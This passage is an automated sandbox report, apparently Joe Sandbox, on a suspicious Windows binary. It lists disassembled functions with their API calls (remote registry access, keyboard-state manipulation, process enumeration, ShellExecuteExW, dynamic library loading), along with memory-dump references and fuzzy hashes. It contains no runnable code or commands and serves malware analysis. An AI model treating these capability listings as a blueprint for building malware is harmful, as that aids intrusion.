                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConnectRegistry_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 535477410-0
                                                                                          • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                          • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                          • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                          • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                          Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • _memset.LIBCMT ref: 004538C4
                                                                                          • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                          • _wcslen.LIBCMT ref: 00453960
                                                                                          • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                          • String ID: 0
                                                                                          • API String ID: 3530711334-4108050209
                                                                                          • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                          • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                          • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                          • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                          Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                          • String ID: HH
                                                                                          • API String ID: 3488606520-2761332787
                                                                                          • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                          • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                          • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                          • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                          Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                          • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                          • LineTo.GDI32(?,?), ref: 004474BF
                                                                                          • CloseFigure.GDI32(?), ref: 004474C6
                                                                                          • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                          • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                          • String ID:
                                                                                          • API String ID: 4082120231-0
                                                                                          • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                          • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                          • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                          • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                          Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                          • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                          • LineTo.GDI32(?,?), ref: 004474BF
                                                                                          • CloseFigure.GDI32(?), ref: 004474C6
                                                                                          • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                          • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                          • String ID:
                                                                                          • API String ID: 4082120231-0
                                                                                          • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                          • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                          • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                          • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                          Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                          • String ID:
                                                                                          • API String ID: 288456094-0
                                                                                          • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                          • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                          • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                          • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                          Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 004449B0
                                                                                          • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                          • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                          • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                          • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                          • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                          Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 00444BA9
                                                                                          • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                          • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                          • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                          • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                          • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                          Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                          • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                          • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                          • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                          Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConnectRegistry_wcslen
                                                                                          • String ID: HH
                                                                                          • API String ID: 535477410-2761332787
                                                                                          • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                          • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                          • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                          • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                          Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00457C34
                                                                                          • _memset.LIBCMT ref: 00457CE8
                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                          • String ID: <$@
                                                                                          • API String ID: 1325244542-1426351568
                                                                                          • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                          • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                          • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                          • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                          Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                          • __wsplitpath.LIBCMT ref: 004737E1
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • _wcscat.LIBCMT ref: 004737F6
                                                                                          • __wcsicoll.LIBCMT ref: 00473818
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                          • String ID:
                                                                                          • API String ID: 2547909840-0
                                                                                          • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                          • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                          • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                          • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                          Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                          • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2354583917-0
                                                                                          • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                          • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                          • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                          • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                          Function 00463D7E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                          • String ID: Wu
                                                                                          • API String ID: 2449869053-4083010176
                                                                                          • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                          • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                          • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                          • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                          Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                          • GetMenu.USER32 ref: 004776AA
                                                                                          • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                          • _wcslen.LIBCMT ref: 0047771A
                                                                                          Memory Dump Source
